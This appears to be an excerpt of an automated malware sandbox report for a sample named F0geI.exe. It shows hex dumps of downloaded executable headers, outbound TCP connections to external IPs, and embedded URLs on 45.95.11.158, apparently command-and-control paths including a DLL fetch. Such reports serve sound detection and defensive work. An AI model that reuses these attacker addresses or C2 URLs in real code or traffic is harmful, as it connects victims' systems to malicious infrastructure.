00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 23 Aug 2022 16:26:21 GMTContent-Type: application/octet-streamContent-Length: 627128Connection: keep-aliveLast-Modified: Mon, 11 Apr 2022 14:39:36 GMTETag: "62543da8-991b8"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 d4 f1 39 62 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 18 08 00 00 56 01 00 00 00 00 00 b0 2f 04 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 09 00 00 04 00 00 ed ee 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 ad bc 08 00 63 51 00 00 10 0e 09 00 2c 01 00 00 00 70 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 72 09 00 b8 1f 00 00 00 80 09 00 34 43 00 00 1c b0 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1c 57 08 00 18 00 00 00 68 30 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 13 09 00 d8 03 00 00 90 b7 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d1 16 08 00 00 10 00 00 00 18 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 9c ff 00 00 00 30 08 00 00 00 01 00 00 1c 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 b8 1c 00 00 00 30 09 00 00 04 00 00 00 1c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 50 09 00 00 02 00 00 00 20 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 60 09 00 00 02 00 00 00 22 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 70 09 00 00 0a 00 00 00 24 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 34 43 00 00 00 80 09 00 00 44 00 00 00 2e 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 23 Aug 2022 16:26:22 GMTContent-Type: application/octet-streamContent-Length: 684984Connection: keep-aliveLast-Modified: Mon, 11 Apr 2022 14:40:08 GMTETag: "62543dc8-a73b8"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 26 f2 39 62 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 1a 08 00 00 36 02 00 00 00 00 00 b0 1f 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 e0 0a 00 00 04 00 00 e9 81 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 34 2c 0a 00 53 00 00 00 87 2c 0a 00 c8 00 00 00 00 a0 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 54 0a 00 b8 1f 00 00 00 b0 0a 00 38 24 00 00 84 26 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 30 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 94 2e 0a 00 44 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d5 19 08 00 00 10 00 00 00 1a 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 30 08 00 00 08 02 00 00 1e 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 40 0a 00 00 02 00 00 00 26 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 90 0a 00 00 02 00 00 00 28 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 a0 0a 00 00 04 00 00 00 2a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 38 24 00 00 00 b0 0a 00 00 26 00 00 00 2e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 23 Aug 2022 16:26:24 GMTContent-Type: application/octet-streamContent-Length: 254392Connection: keep-aliveLast-Modified: Mon, 11 Apr 2022 14:39:58 GMTETag: "62543dbe-3e1b8"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 27 f2 39 62 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f2 00 00 00 00 00 00 80 ce 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 a1 de 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 74 76 03 00 53 01 00 00 c7 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c2 03 00 b8 1f 00 00 00 c0 03 00 98 35 00 00 68 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 44 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 56 ca 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 04 ac 00 00 00 e0 02 00 00 ae 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 88 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 98 35 00 00 00 c0 03 00 00 36 00 00 00 8c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 23 Aug 2022 16:26:31 GMTContent-Type: application/octet-streamContent-Length: 1099223Connection: keep-aliveLast-Modified: Mon, 11 Apr 2022 12:28:56 GMTETag: "62541f08-10c5d7"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 22 a9 2c 62 00 76 0e 00 b2 13 00 00 e0 00 06 21 0b 01 02 19 00 0c 0b 00 00 fa 0c 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 20 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 10 0f 00 00 06 00 00 c8 9d 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 b0 0c 00 6e 2a 00 00 00 e0 0c 00 d0 0c 00 00 00 10 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 0d 00 e0 3b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c e2 0c 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ac 0a 0b 00 00 10 00 00 00 0c 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 20 0b 00 00 28 00 00 00 12 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 10 44 01 00 00 50 0b 00 00 46 01 00 00 3a 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 a0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 6e 2a 00 00 00 b0 0c 00 00 2c 00 00 00 80 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 e0 0c 00 00 0e 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 f0 0c 00 00 02 00 00 00 ba 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 00 0d 00 00 02 00 00 00 bc 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 10 0d 00 00 06 00 00 00 be 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 e0 3b 00 00 00 20 0d 00 00 3c 00 00 00 c4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 60 0d 00 00 06 00 00 00 00 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 70 0d 00 00 ca 00 00 00 06 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 40 0e 00 00 28 00 00 00 d0 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00
                    Source: global trafficTCP traffic: 192.168.2.6:49934 -> 103.89.90.61:34589
                    Source: global trafficTCP traffic: 192.168.2.6:49978 -> 195.54.170.157:16525
                    Source: global trafficTCP traffic: 192.168.2.6:49991 -> 176.113.115.146:9582
                    Source: F0geI.exe, 0000000E.00000002.467977911.0000000000710000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.396363092.0000000000710000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.375938581.000000000070C000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.369679609.0000000000711000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.405647250.0000000000711000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.357431228.0000000000710000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.408359829.0000000000711000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.400990098.0000000000711000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.409321567.0000000000711000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.370161583.000000000070C000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.414431083.0000000000711000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.392778204.000000000070B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.95.11.158/
                    Source: F0geI.exe, 0000000E.00000002.467977911.0000000000710000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.95.11.158/0b9fc74f88461d24a2759a8cca9d600dowsCodecs.dll
                    Source: F0geI.exe, 0000000E.00000002.468773615.000000000073F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.95.11.158/11
                    Source: F0geI.exe, 0000000E.00000002.467977911.0000000000710000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.396363092.0000000000710000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.375938581.000000000070C000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.369679609.0000000000711000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.405647250.0000000000711000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.408359829.0000000000711000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.400990098.0000000000711000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.409321567.0000000000711000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.370161583.000000000070C000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.414431083.0000000000711000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.392778204.000000000070B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.95.11.158/70b9fc74f88461d24a2759a8cca9d600
                    Source: F0geI.exe, 0000000E.00000003.369679609.0000000000711000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.95.11.158/70b9fc74f88461d24a2759a8cca9d6007hL2vK/nss3.dll
                    Source: F0geI.exe, 0000000E.00000003.392778204.000000000070B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.95.11.158/70b9fc74f88461d24a2759a8cca9d600D;
                    Source: F0geI.exe, 0000000E.00000002.468773615.000000000073F000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.391415880.000000000073F000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.372312694.000000000073F000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.407719860.000000000073F000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.412792997.000000000073F000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.413897712.000000000073F000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.378491728.000000000073F000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.397115573.000000000073F000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.393842203.000000000073F000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.409958751.000000000073F000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.369754344.000000000073F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.95.11.158/70b9fc74f88461d24a2759a8cca9d600T
                    Source: F0geI.exe, 0000000E.00000003.406575357.0000000000711000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.410875228.0000000000711000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.398228449.0000000000711000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.390750632.000000000070C000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.413737168.0000000000711000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000002.467977911.0000000000710000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.396363092.0000000000710000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.375938581.000000000070C000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.369679609.0000000000711000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.405647250.0000000000711000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.408359829.0000000000711000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.400990098.0000000000711000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.409321567.0000000000711000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.370161583.000000000070C000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.414431083.0000000000711000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.392778204.000000000070B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.95.11.158/70b9fc74f88461d24a2759a8cca9d600U;
                    Source: F0geI.exe, 0000000E.00000003.392778204.000000000070B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.95.11.158/70b9fc74f88461d24a2759a8cca9d600al
                    Source: F0geI.exe, 0000000E.00000003.392778204.000000000070B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.95.11.158/70b9fc74f88461d24a2759a8cca9d600al):n
                    Source: F0geI.exe, 0000000E.00000002.467977911.0000000000710000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.95.11.158/70b9fc74f88461d24a2759a8cca9d600l
                    Source: F0geI.exe, 0000000E.00000003.375938581.000000000070C000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.369679609.0000000000711000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.370161583.000000000070C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.95.11.158/70b9fc74f88461d24a2759a8cca9d600ll):n
                    Source: F0geI.exe, 0000000E.00000002.468773615.000000000073F000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.407719860.000000000073F000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.412792997.000000000073F000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.413897712.000000000073F000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.397115573.000000000073F000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.393842203.000000000073F000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.409958751.000000000073F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.95.11.158/70b9fc74f88461d24a2759a8cca9d600r
                    Source: F0geI.exe, 0000000E.00000002.468773615.000000000073F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.95.11.158/70b9fc74f88461d24a2759a8cca9d600t.XboxApp_8wekyb3d8bbwe
                    Source: F0geI.exe, 0000000E.00000003.406575357.0000000000711000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.410875228.0000000000711000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.398228449.0000000000711000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.413737168.0000000000711000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.396363092.0000000000710000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.405647250.0000000000711000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.408359829.0000000000711000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.400990098.0000000000711000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.409321567.0000000000711000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.414431083.0000000000711000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.392778204.000000000070B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.95.11.158/70b9fc74f88461d24a2759a8cca9d600ta
                    Source: F0geI.exe, 0000000E.00000003.369679609.0000000000711000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.392778204.000000000070B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.95.11.158/70b9fc74f88461d24a2759a8cca9d600w
                    Source: F0geI.exe, 0000000E.00000003.367804271.0000000000711000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.308958287.0000000000713000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.375938581.000000000070C000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.369679609.0000000000711000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.357431228.0000000000710000.00000004.00000020.00020000.00000000.sdmp, F0geI.exe, 0000000E.00000003.370161583.000000000070C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.95.11.158/B
                    Source: F0geI.exe, 0000000E.00000002.463958585.00000000006E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.95.11.158/I
